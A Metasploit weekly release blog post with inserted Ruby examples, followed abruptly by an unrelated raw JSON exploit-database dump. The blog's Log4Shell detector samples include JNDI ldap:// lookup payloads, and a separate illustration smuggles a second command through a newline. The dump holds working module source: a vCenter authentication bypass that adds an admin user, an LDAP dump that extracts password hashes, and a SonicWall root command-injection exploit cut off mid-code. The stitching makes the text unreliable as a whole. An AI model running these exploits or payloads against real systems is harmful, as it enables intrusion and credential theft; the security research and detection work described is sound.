## Log4Shell goodness

Log4Shell made for an unfortunate end to 2021 for many organizations, but it also makes for some great additions to Metasploit Framework. Contributors [sempervictus](<https://github.com/sempervictus>), [schierlm](<https://github.com/schierlm>), [righel](<https://github.com/righel>), [timwr](<https://github.com/timwr>) and our very own [Spencer McIntyre](<https://github.com/smcintyre-r7>) have collaborated to bring us a Log4Shell module that uses header stuffing (placing the JNDI lookup string in many HTTP request headers at once, so that whichever header the target passes through a vulnerable Log4j triggers the lookup) to exploit vulnerable HTTP servers, resulting in remote code execution.
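The defensive side of the same technique, as an added example that is not code from the Metasploit module or from Rapid7: a small Ruby detector for JNDI lookup strings in request headers. Log4j resolves nested lookups innermost-first, so attackers hide the literal `jndi` behind `${lower:...}`, `${upper:...}` and the `${x:-default}` form; the detector resolves those same lookups before matching, so the obfuscated variants are caught as well. The header values are constructed samples, not captured traffic.

```ruby
# Added example (not Metasploit code): detect Log4Shell-style JNDI lookups
# in HTTP request headers, including nested/obfuscated forms.

# One lookup with no further lookup nested inside it.
LOOKUP = /\$\{([^${}]*)\}/

# Evaluate a single innermost lookup the way Log4j 2.x would for the lookups
# attackers actually use to hide "jndi". Anything else (including the jndi:
# lookup itself) is returned unchanged.
def resolve_lookup(body)
  # "${::-j}" and "${env:UNSET:-j}" evaluate to the default after ":-"
  return body.split(':-', 2).last if body.include?(':-')

  name, arg = body.split(':', 2)
  case name.to_s.downcase
  when 'lower' then arg.to_s.downcase
  when 'upper' then arg.to_s.upcase
  else "${#{body}}"
  end
end

# Rewrite nested lookups innermost-first until nothing changes. The loop is
# bounded so pathological input cannot spin forever.
def normalize(value)
  s = value.dup
  10.times do
    before = s
    s = s.gsub(LOOKUP) { resolve_lookup(Regexp.last_match(1)) }
    break if s == before
  end
  s
end

def jndi_lookup?(value)
  normalize(value).match?(/\$\{\s*jndi\s*:/i)
end

# Names of the headers carrying a JNDI lookup.
def flag_headers(headers)
  headers.select { |_, v| jndi_lookup?(v) }.keys
end

# Constructed sample headers (not real traffic).
SAMPLE_HEADERS = {
  'Host'            => 'app.example.com',
  'User-Agent'      => '${jndi:ldap://203.0.113.5:1389/a}',
  'X-Api-Version'   => '${${lower:j}${upper:n}${::-d}${env:UNSET:-i}:ldap://203.0.113.5/x}',
  'Referer'         => 'https://example.com/?q=${jndi:rmi://203.0.113.5/o}',
  'X-Forwarded-For' => '${lower:HELLO}' # a lookup, but not a JNDI one
}.freeze

if __FILE__ == $PROGRAM_NAME
  flag_headers(SAMPLE_HEADERS).each { |h| puts "JNDI lookup in #{h}: #{SAMPLE_HEADERS[h]}" }
end
```

The resolver only implements the lookups that matter for de-obfuscation; unknown ones are left in place, which is also what makes the final `${jndi:` match reliable. Matching on the raw string alone would miss the `X-Api-Version` value above.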
## SonicWall SSL VPN module for Rapid7-discovered vulnerability
Rapid7 disclosed the technical details of [five vulnerabilities](<https://www.rapid7.com/blog/post/2022/01/11/cve-2021-20038-42-sonicwall-sma-100-multiple-vulnerabilities-fixed-2/>) discovered by [jbaines-r7](<https://github.com/jbaines-r7>) affecting SonicWall's SMA 100 series of SSL VPN devices. The disclosure included landing a Metasploit module that gives an authenticated remote attacker `root` access to the device using CVE-2021-20039.
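The bug class behind CVE-2021-20039 is worth a closer look: a deny-list filter that strips the usual shell metacharacters but lets a bare newline through, even though `/bin/sh` treats a newline as a command separator just like `;`. The Ruby below is an added illustration, not SonicWall's code or the Metasploit module; the exact metacharacter list, the `/certs/` path and the handler names are assumptions made for the example.

```ruby
# Added example (hypothetical reconstruction, not SonicWall or Metasploit
# code): why a deny-list filter that forgets "\n" still allows injection
# into system(), and the allow-list check that closes it.

# Assumed deny list in the spirit of the vulnerable check.
DENIED = ['/', '$', '&', '|', '>', ';', '`', '^'].freeze

def denylist_ok?(value)
  DENIED.none? { |c| value.include?(c) }
end

# Allow-list: a certificate name is only ever a short, plain token.
ALLOWED = /\A[A-Za-z0-9_.-]{1,64}\z/

def allowlist_ok?(value)
  ALLOWED.match?(value)
end

# How /bin/sh splits a command line: both ";" and a newline end a command,
# so each element here is a separately executed command.
def shell_commands(cmdline)
  cmdline.split(/[\n;]/).map(&:strip).reject(&:empty?)
end

# Hypothetical vulnerable handler: trusts denylist_ok? and then builds a
# shell command string from the user-controlled value, as system() would.
def delete_cert_vulnerable(value)
  return :rejected unless denylist_ok?(value)
  shell_commands("rm /certs/#{value}")
end

# Hardened handler: same command, allow-list validation instead.
def delete_cert_fixed(value)
  return :rejected unless allowlist_ok?(value)
  shell_commands("rm /certs/#{value}")
end

# Constructed input: no denied character, but the newline smuggles a second
# command onto the line.
INJECTED = "n\nperl -e 'print 1'"
```

Run `delete_cert_vulnerable(INJECTED)` and the result is two commands, the second of which is attacker-chosen; `delete_cert_fixed(INJECTED)` rejects the value outright. The lesson generalizes: validate against the shape you expect (an allow-list), and avoid passing user input through a shell at all when an `exec`-style call with an argument array will do.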
## Pi-Hole command execution and common exploit library
An exciting new addition has worked its way into Metasploit Framework this week. Contributor [h00die](<https://github.com/h00die>) has created an authenticated RCE module that takes advantage of improper escaping of characters in the `validDomainWildcard` field of Pi-hole's Top Domains API. h00die has also created a library that aims to make developing future Pi-hole modules easier.
## New module content (4)
* [Pi-Hole Top Domains API Authenticated Exec](<https://github.com/rapid7/metasploit-framework/pull/16012>) by SchneiderSec and h00die, which exploits [CVE-2021-32706](<https://attackerkb.com/topics/4c25C9i2U2/cve-2021-32706?referrer=blog>) \- This adds an auxiliary module that executes commands against Pi-Hole versions <= `5.5`. This also introduces a Pi-Hole library for common functionality required in exploits against the service.
* [SonicWall SMA 100 Series Authenticated Command Injection](<https://github.com/rapid7/metasploit-framework/pull/16041>) by jbaines-r7, which exploits [CVE-2021-20039](<https://attackerkb.com/topics/9szJhq46lw/cve-2021-20039?referrer=blog>) \- This adds a module that exploits an authenticated command injection vulnerability in multiple versions of the SonicWALL SMA 100 series web interface. In the SSL certificate deletion functionality, the sanitization logic permits the `\n` character which acts as a terminator when passed to a call to `system()`. An authenticated attacker can execute arbitrary commands as the `root` user.
* [Log4Shell HTTP Header Injection](<https://github.com/rapid7/metasploit-framework/pull/15969>) by sinn3r, juan vazquez, Michael Schierl, RageLtMan, and Spencer McIntyre, which exploits [CVE-2021-44228](<https://attackerkb.com/topics/in9sPR2Bzt/cve-2021-44228-log4shell?referrer=blog>) \- This adds an exploit for HTTP servers that are affected by the Log4J/Log4Shell vulnerability via header stuffing.
* [Microsoft Windows SMB Direct Session Takeover](<https://github.com/rapid7/metasploit-framework/pull/15903>) by usiegl00 \- This adds a new exploit module that implements the Shadow Attack, an SMB Direct session takeover. Before running this module, a MitM position must already be established (for example with any ARP spoofing/poisoning tool used alongside Metasploit) so that the module can intercept SMB authentication requests between a client and a server. If the connecting user is an administrator and network logins are allowed on the target machine, this module executes an arbitrary payload.
## Enhancements and features
* [#15656](<https://github.com/rapid7/metasploit-framework/pull/15656>) from [HynekPetrak](<https://github.com/HynekPetrak>) \- This enables the `vmware_vcenter_vmdir_auth_bypass` module to create an admin user even if the target is not vulnerable to CVE-2020-3952, assuming we have obtained valid credentials to the vCenter LDAP directory.
* [#16021](<https://github.com/rapid7/metasploit-framework/pull/16021>) from [zeroSteiner](<https://github.com/zeroSteiner>) \- This adds additional tests for Meterpreter's mkdir/rmdir functionality to ensure uniform implementations across all Meterpreters.
* [#16024](<https://github.com/rapid7/metasploit-framework/pull/16024>) from [sjanusz-r7](<https://github.com/sjanusz-r7>) \- This adds a new Meterpreter command that allows the end user to kill all channels at once.
* [#16040](<https://github.com/rapid7/metasploit-framework/pull/16040>) from [jmartin-r7](<https://github.com/jmartin-r7>) \- Removes Ruby 2.5 support, as that release is officially end-of-life.
* [#12217](<https://github.com/rapid7/metasploit-framework/pull/12217>) from [SkypLabs](<https://github.com/SkypLabs>) \- This stores the decoded F5 load balancer cookie in the notes database and cleans up the module (rubocop, documentation, references).
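For readers who have not met the F5 cookie before, here is what that module is decoding, as an added example in Ruby that is not the Metasploit module's own code. In the default, unencrypted format F5 documents as `<ip>.<port>.0000`, the pool member's IPv4 address is a decimal 32-bit integer and the port a decimal 16-bit integer, both stored little-endian; a byte swap recovers the internal host and port that the load balancer would otherwise hide. The `Set-Cookie` values are constructed; the first cookie value is the one from F5's own documentation.

```ruby
# Added example (not the Metasploit module's code): decode BIG-IP
# persistence cookies found in Set-Cookie headers.

# Returns [ip, port] for the default cookie format, nil for anything else
# (encrypted cookies and the IPv6 / route-domain encodings are not handled).
def decode_bigip_cookie(value)
  m = value.match(/\A(\d{1,10})\.(\d{1,5})\.0000\z/)
  return nil unless m

  ip_le = m[1].to_i
  port_le = m[2].to_i
  return nil if ip_le > 0xFFFF_FFFF || port_le > 0xFFFF

  # Pack as little-endian and read the bytes back in order: this is the
  # byte swap that turns 1677787402 into 10.1.1.100 and 36895 into 8080.
  ip   = [ip_le].pack('V').bytes.join('.')
  port = [port_le].pack('v').unpack1('n')
  [ip, port]
end

# Scan Set-Cookie values and decode every BIGipServer<pool> cookie.
# Result: { pool_name => [ip, port] }
def bigip_cookies(set_cookie_values)
  set_cookie_values.each_with_object({}) do |hdr, out|
    name, rest = hdr.split('=', 2)
    next unless name && rest && name.start_with?('BIGipServer')

    decoded = decode_bigip_cookie(rest.split(';', 2).first.to_s.strip)
    out[name.delete_prefix('BIGipServer')] = decoded if decoded
  end
end

# Constructed response headers. "web_pool" uses F5's documented sample
# value; "api_pool" carries a route-domain form this decoder deliberately
# skips rather than misreading.
SAMPLE_SET_COOKIE = [
  'BIGipServerweb_pool=1677787402.36895.0000; path=/',
  'JSESSIONID=0123456789ABCDEF; Path=/; HttpOnly',
  'BIGipServerapi_pool=rd5o00000000000000000000ffffc0000201o80; path=/'
].freeze

if __FILE__ == $PROGRAM_NAME
  bigip_cookies(SAMPLE_SET_COOKIE).each { |pool, (ip, port)| puts "#{pool}: #{ip}:#{port}" }
end
```

The practical takeaway for defenders is the mitigation F5 itself recommends: enable cookie encryption on the persistence profile, so the value no longer leaks the back-end address to every client.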
## Bugs fixed
* [#16016](<https://github.com/rapid7/metasploit-framework/pull/16016>) from [bwatters-r7](<https://github.com/bwatters-r7>) \- This fixes an issue in the `auxiliary/scanner/dcerpc/hidden` module where the `RHOSTS` datastore option was not available, resulting in hosts not being scanned.
* [#16027](<https://github.com/rapid7/metasploit-framework/pull/16027>) from [zeroSteiner](<https://github.com/zeroSteiner>) \- This fixes an issue with tab completion for the `generate` command. Completion now works with both the `-f` and `-o` flags.
* [#16043](<https://github.com/rapid7/metasploit-framework/pull/16043>) from [shoxxdj](<https://github.com/shoxxdj>) \- Fixes a crash in the `auxiliary/scanner/http/wordpress_scanner` module when attempting to scan themes.
## Get it
As always, you can update to the latest Metasploit Framework with `msfupdate`
and you can get more details on the changes since the last blog post from
GitHub:
* [Pull Requests 6.1.23...6.1.25](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222022-01-06T10%3A44%3A33-06%3A00..2022-01-13T13%3A35%3A39-06%3A00%22>)
* [Full diff 6.1.23...6.1.25](<https://github.com/rapid7/metasploit-framework/compare/6.1.23...6.1.25>)
If you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest.
To install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the
[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).
end\n\n ldap_connect do |ldap|\n print_status(\"Bypassing LDAP auth in vmdir service at #{peer}\")\n auth_bypass(ldap)\n\n print_status(\"Adding admin user #{username} with password #{password}\")\n\n unless add_admin(ldap)\n print_error(\"Failed to add admin user #{username}\")\n end\n end\n rescue Net::LDAP::Error => e\n print_error(\"#{e.class}: #{e.message}\")\n end\n\n # This will always return false, since the creds are invalid\n def auth_bypass(ldap)\n # when datastore['BIND_DN'] has been provided in options,\n # ldap_connect has already made a bind for us.\n return if datastore['BIND_DN']\n\n ldap.bind(\n method: :simple,\n username: Rex::Text.rand_text_alphanumeric(8..42),\n password: Rex::Text.rand_text_alphanumeric(8..42)\n )\n end\n\n def add_admin(ldap)\n user_info = {\n 'objectClass' => %w[top person organizationalPerson user],\n 'cn' => username,\n 'sn' => 'vsphere.local',\n 'givenName' => username,\n 'sAMAccountName' => username,\n 'userPrincipalName' => \"#{username}@VSPHERE.LOCAL\",\n 'uid' => username,\n 'userPassword' => password\n }\n\n # Add our new user\n unless ldap.add(dn: user_dn, attributes: user_info)\n res = ldap.get_operation_result\n\n case res.code\n when Net::LDAP::ResultCodeInsufficientAccessRights\n print_error('Failed to bypass LDAP auth in vmdir service')\n when Net::LDAP::ResultCodeEntryAlreadyExists\n print_error(\"User #{username} already exists\")\n when Net::LDAP::ResultCodeConstraintViolation\n print_error(\"Password #{password} does not meet policy requirements\")\n else\n print_error(\"#{res.message}: #{res.error_message}\")\n end\n\n return false\n end\n\n print_good(\"Added user #{username}, so auth bypass was successful!\")\n\n # Add our user to the admin group\n unless ldap.add_attribute(group_dn, 'member', user_dn)\n res = ldap.get_operation_result\n\n if res.code == Net::LDAP::ResultCodeAttributeOrValueExists\n print_error(\"User #{username} is already an admin\")\n else\n print_error(\"#{res.message}: 
#{res.error_message}\")\n end\n\n return false\n end\n\n print_good(\"Added user #{username} to admin group\")\n\n true\n end\n\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass.rb", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-06-24T08:40:37", "description": "This module uses an anonymous-bind LDAP connection to dump data from the vmdir service in VMware vCenter Server version 6.7 prior to the 6.7U3f update, only if upgraded from a previous release line, such as 6.0 or 6.5. If the bind username and password are provided (BIND_DN and BIND_PW options), these credentials will be used instead of attempting an anonymous bind.\n", "cvss3": {}, "published": "2020-04-22T22:38:12", "type": "metasploit", "title": "VMware vCenter Server vmdir Information Disclosure", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-3952"], "modified": "2022-01-12T15:51:40", "id": "MSF:AUXILIARY-GATHER-VMWARE_VCENTER_VMDIR_LDAP-", "href": "https://www.rapid7.com/db/modules/auxiliary/gather/vmware_vcenter_vmdir_ldap/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'metasploit/framework/hashes/identify'\n\nclass MetasploitModule < Msf::Auxiliary\n\n include Msf::Exploit::Remote::LDAP\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'VMware vCenter Server vmdir Information Disclosure',\n 'Description' => %q{\n This module uses an anonymous-bind LDAP connection to dump data from\n the vmdir service in VMware vCenter Server version 6.7 prior to the\n 6.7U3f update, only if upgraded from a previous release line, such as\n 6.0 or 6.5.\n If the bind username and password are provided (BIND_DN and BIND_PW\n options), these credentials will be used instead of attempting an\n anonymous bind.\n },\n 
'Author' => [\n 'Hynek Petrak', # Discovery, hash dumping\n 'wvu' # Module\n ],\n 'References' => [\n ['CVE', '2020-3952'],\n ['URL', 'https://www.vmware.com/security/advisories/VMSA-2020-0006.html']\n ],\n 'DisclosureDate' => '2020-04-09', # Vendor advisory\n 'License' => MSF_LICENSE,\n 'Actions' => [\n ['Dump', { 'Description' => 'Dump all LDAP data' }]\n ],\n 'DefaultAction' => 'Dump',\n 'DefaultOptions' => {\n 'SSL' => true\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'SideEffects' => [IOC_IN_LOGS],\n 'Reliability' => []\n }\n )\n )\n\n register_options([\n Opt::RPORT(636), # SSL/TLS\n OptString.new('BASE_DN', [false, 'LDAP base DN if you already have it'])\n ])\n end\n\n def base_dn\n @base_dn ||= 'dc=vsphere,dc=local'\n end\n\n def policy_dn\n \"cn=password and lockout policy,#{base_dn}\"\n end\n\n # PoC using ldapsearch(1):\n #\n # Retrieve root DSE with base DN:\n # ldapsearch -xb \"\" -s base -H ldap://[redacted]\n #\n # Dump data using discovered base DN:\n # ldapsearch -xb dc=vsphere,dc=local -H ldap://[redacted] \\* + -\n def run\n entries = nil\n\n ldap_connect do |ldap|\n if (@base_dn = datastore['BASE_DN'])\n print_status(\"User-specified base DN: #{base_dn}\")\n else\n print_status('Discovering base DN automatically')\n\n unless (@base_dn = discover_base_dn(ldap))\n print_warning('Falling back on default base DN dc=vsphere,dc=local')\n end\n end\n\n print_status(\"Dumping LDAP data from vmdir service at #{peer}\")\n\n # A \"-\" meta-attribute will dump userPassword (hat tip Hynek)\n # https://github.com/vmware/lightwave/blob/3bc154f823928fa0cf3605cc04d95a859a15c2a2/vmdir/server/ldap-head/result.c#L647-L654\n entries = ldap.search(base: base_dn, attributes: %w[* + -])\n end\n\n # Look for an entry with a non-empty vmwSTSPrivateKey attribute\n unless entries&.find { |entry| entry[:vmwstsprivatekey].any? 
}\n print_error(\"#{peer} is NOT vulnerable to CVE-2020-3952\") unless datastore['BIND_PW'].present?\n print_error('Dump failed')\n return Exploit::CheckCode::Safe\n end\n\n print_good(\"#{peer} is vulnerable to CVE-2020-3952\") unless datastore['BIND_PW'].present?\n pillage(entries)\n\n # HACK: Stash discovered base DN in CheckCode reason\n Exploit::CheckCode::Vulnerable(base_dn)\n rescue Net::LDAP::Error => e\n print_error(\"#{e.class}: #{e.message}\")\n Exploit::CheckCode::Unknown\n end\n\n def pillage(entries)\n # TODO: Make this more efficient?\n ldif = entries.map(&:to_ldif).map { |s| s.force_encoding('utf-8') }.join(\"\\n\")\n\n print_status('Storing LDAP data in loot')\n\n ldif_filename = store_loot(\n name, # ltype\n 'text/plain', # ctype\n rhost, # host\n ldif, # data\n nil, # filename\n \"Base DN: #{base_dn}\" # info\n )\n\n unless ldif_filename\n print_error('Could not store LDAP data in loot')\n return\n end\n\n print_good(\"Saved LDAP data to #{ldif_filename}\")\n\n if (policy = entries.find { |entry| entry.dn == policy_dn })\n print_status('Password and lockout policy:')\n print_line(policy.to_ldif[/^vmwpassword.*/m])\n end\n\n # Process entries with a non-empty userPassword attribute\n process_hashes(entries.select { |entry| entry[:userpassword].any? 
})\n end\n\n def process_hashes(entries)\n if entries.empty?\n print_status('No password hashes found')\n return\n end\n\n service_details = {\n workspace_id: myworkspace_id,\n module_fullname: fullname,\n origin_type: :service,\n address: rhost,\n port: rport,\n protocol: 'tcp',\n service_name: 'vmdir/ldap'\n }\n\n entries.each do |entry|\n # This is the \"username\"\n dn = entry.dn\n\n # https://github.com/vmware/lightwave/blob/3bc154f823928fa0cf3605cc04d95a859a15c2a2/vmdir/server/middle-layer/password.c#L32-L76\n type, hash, salt = entry[:userpassword].first.unpack('CH128H32')\n\n case type\n when 1\n unless hash.length == 128\n vprint_error(\"Type #{type} hash length is not 128 digits (#{dn})\")\n next\n end\n\n unless salt.length == 32\n vprint_error(\"Type #{type} salt length is not 32 digits (#{dn})\")\n next\n end\n\n # https://github.com/magnumripper/JohnTheRipper/blob/2778d2e9df4aa852d0bc4bfbb7b7f3dde2935b0c/doc/DYNAMIC#L197\n john_hash = \"$dynamic_82$#{hash}$HEX$#{salt}\"\n else\n vprint_error(\"Hash type #{type.inspect} is not supported yet (#{dn})\")\n next\n end\n\n print_good(\"Credentials found: #{dn}:#{john_hash}\")\n\n create_credential(service_details.merge(\n username: dn,\n private_data: john_hash,\n private_type: :nonreplayable_hash,\n jtr_format: identify_hash(john_hash)\n ))\n end\n end\n\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/gather/vmware_vcenter_vmdir_ldap.rb", "cvss": {"score": 0.0, "vector": "NONE"}}], "attackerkb": [{"lastseen": "2022-04-29T16:12:07", "description": "A Stack-based buffer overflow vulnerability in SMA100 Apache httpd server\u2019s mod_cgi module environment variables allows a remote unauthenticated attacker to potentially execute code as a \u2018nobody\u2019 user in the appliance. 
This vulnerability affected SMA 200, 210, 400, 410 and 500v appliances firmware 10.2.0.8-37sv, 10.2.1.1-19sv, 10.2.1.2-24sv and earlier versions.\n\n \n**Recent assessments:** \n \n**jbaines-r7** at January 11, 2022 2:19pm UTC reported:\n\nThis unauthenticated and remote stack-based buffer overflow allows an attacker to execute code on the remote SMA 100 series target. Exploitation can be a challenge though. For additional details, see the Rapid7 analysis.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 2\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-11T00:00:00", "type": "attackerkb", "title": "CVE-2021-20038", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-20038", "CVE-2021-20039"], "modified": "2022-01-11T00:00:00", "id": "AKB:1AE51720-4534-42A8-879C-01FFE347E837", "href": "https://attackerkb.com/topics/QyXRC1wbvC/cve-2021-20038", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-06-14T23:28:08", "description": "Under certain conditions, vmdir that ships with VMware vCenter Server, as part of an embedded 
or external Platform Services Controller (PSC), does not correctly implement access controls.\n\n \n**Recent assessments:** \n \n**wvu-r7** at April 16, 2020 1:25pm UTC reported:\n\nTechnical details on the vuln are out: <https://www.guardicore.com/2020/04/pwning-vmware-vcenter-cve-2020-3952/>. It\u2019s quite a bit more than information disclosure. Full auth bypass and the ability to add an arbitrary admin user. I\u2019ve confirmed it myself and added a second [module](<https://github.com/rapid7/metasploit-framework/pull/13253>).\n\nETA: I noted the following in an earlier response here:\n\n> The data seemed to contain secrets related to VMware\u2019s Security Token Service (STS) for single sign-on (SSO).\n\nSo information disclosure is still on the table for obtaining access. Presumably, you would use the STS private key to sign forged SAML tokens used in the STS SSO system. Wanted to update AKB, since we\u2019d been talking about it in work Slack. 
:)\n\nHats off to the Guardicore team for their dedicated analysis.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-04-10T00:00:00", "type": "attackerkb", "title": "CVE-2020-3952 - VMware vCenter Server vmdir Information Disclosure", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3952"], "modified": "2020-08-28T00:00:00", "id": "AKB:85036BC9-E798-46CE-A5B3-43BDCFE83346", "href": "https://attackerkb.com/topics/f5Gs82lZKq/cve-2020-3952---vmware-vcenter-server-vmdir-information-disclosure", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2022-01-14T03:42:55", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", 
"version": "3.1"}, "impactScore": 5.9}, "published": "2022-01-13T00:00:00", "type": "packetstorm", "title": "SonicWall SMA 100 Series Authenticated Command Injection", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-20038", "CVE-2021-20039"], "modified": "2022-01-13T00:00:00", "id": "PACKETSTORM:165563", "href": "https://packetstormsecurity.com/files/165563/SonicWall-SMA-100-Series-Authenticated-Command-Injection.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::CmdStager \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'SonicWall SMA 100 Series Authenticated Command Injection', \n'Description' => %q{ \nThis module exploits an authenticated command injection vulnerability \nin the SonicWall SMA 100 series web interface. Exploitation results in \ncommand execution as root. 
The affected versions are: \n \n- 10.2.1.2-24sv and below \n- 10.2.0.8-37sv and below \n- 9.0.0.11-31sv and below \n}, \n'License' => MSF_LICENSE, \n'Author' => [ \n'jbaines-r7' # Vulnerability discovery and Metasploit module \n], \n'References' => [ \n[ 'CVE', '2021-20039' ], \n[ 'URL', 'https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0026'], \n[ 'URL', 'https://www.rapid7.com/blog/post/2022/01/11/cve-2021-20038-42-sonicwall-sma-100-multiple-vulnerabilities-fixed-2'], \n[ 'URL', 'https://attackerkb.com/topics/9szJhq46lw/cve-2021-20039/rapid7-analysis'] \n], \n'DisclosureDate' => '2021-12-14', \n'Platform' => ['linux'], \n'Arch' => [ARCH_X86], \n'Privileged' => true, \n'Targets' => [ \n[ \n'Linux Dropper', \n{ \n'Platform' => 'linux', \n'Arch' => [ARCH_X86], \n'Type' => :linux_dropper, \n'CmdStagerFlavor' => [ 'echo', 'printf' ] \n} \n] \n], \n'DefaultTarget' => 0, \n'DefaultOptions' => { \n'RPORT' => 443, \n'SSL' => true, \n'PrependFork' => true \n}, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK ] \n} \n) \n) \nregister_options([ \nOptString.new('TARGETURI', [true, 'Base path', '/']), \nOptString.new('USERNAME', [true, 'The username to authenticate with', 'admin']), \nOptString.new('PASSWORD', [true, 'The password to authenticate with', 'password']), \nOptString.new('SWDOMAIN', [true, 'The domain to log in to', 'LocalDomain']), \nOptString.new('PORTALNAME', [true, 'The portal to log in to', 'VirtualOffice']) \n]) \nend \n \n## \n# Extract the version number from a javascript include in the login landing page. \n# And compare the version against known affected. 
Affected versions are: \n# \n# 10.2.1.2-24sv and below \n# 10.2.0.8-37sv and below \n# 9.0.0.11-31sv and below \n## \ndef check \nres = send_request_cgi({ \n'uri' => normalize_uri(target_uri.path, '/cgi-bin/welcome'), \n'agent' => 'SonicWALL Mobile Connect' \n}) \nreturn CheckCode::Unknown('Failed to retrieve the version information') unless res&.code == 200 \n \nversion = res.body.match(/\\.([0-9.\\-a-z]+)\\.js\" type=/) \nreturn CheckCode::Unknown('Failed to retrieve the version information') unless version \n \nversion = version[1] \n \nmajor, minor, revision, build = version.split('.', 4) \nbuild, point = build.split('-', 2) \nprint_status(\"Version found: #{major}.#{minor}.#{revision}.#{build}-#{point}\") \npoint.delete_suffix('sv') \n \ncase major \nwhen '9' \nreturn CheckCode::Safe unless minor.to_i == 0 && revision.to_i == 0 && build.to_i <= 11 && point.to_i <= 31 \nwhen '10' \nreturn CheckCode::Safe unless minor.to_i == 2 \n \ncase revision \nwhen '0' \nreturn CheckCode::Safe unless build.to_i <= 8 && point.to_i <= 37 \nwhen '1' \nreturn CheckCode::Safe unless build.to_i <= 2 && point.to_i <= 24 \nelse \nreturn CheckCode::Safe \nend \nelse \nreturn CheckCode::Safe \nend \nCheckCode::Appears('Based on the discovered version.') \nend \n \ndef login \nres = send_request_cgi({ \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, '/cgi-bin/userLogin'), \n'agent' => 'SonicWALL Mobile Connect', \n'vars_post' => \n{ \n'username' => datastore['USERNAME'], \n'password' => 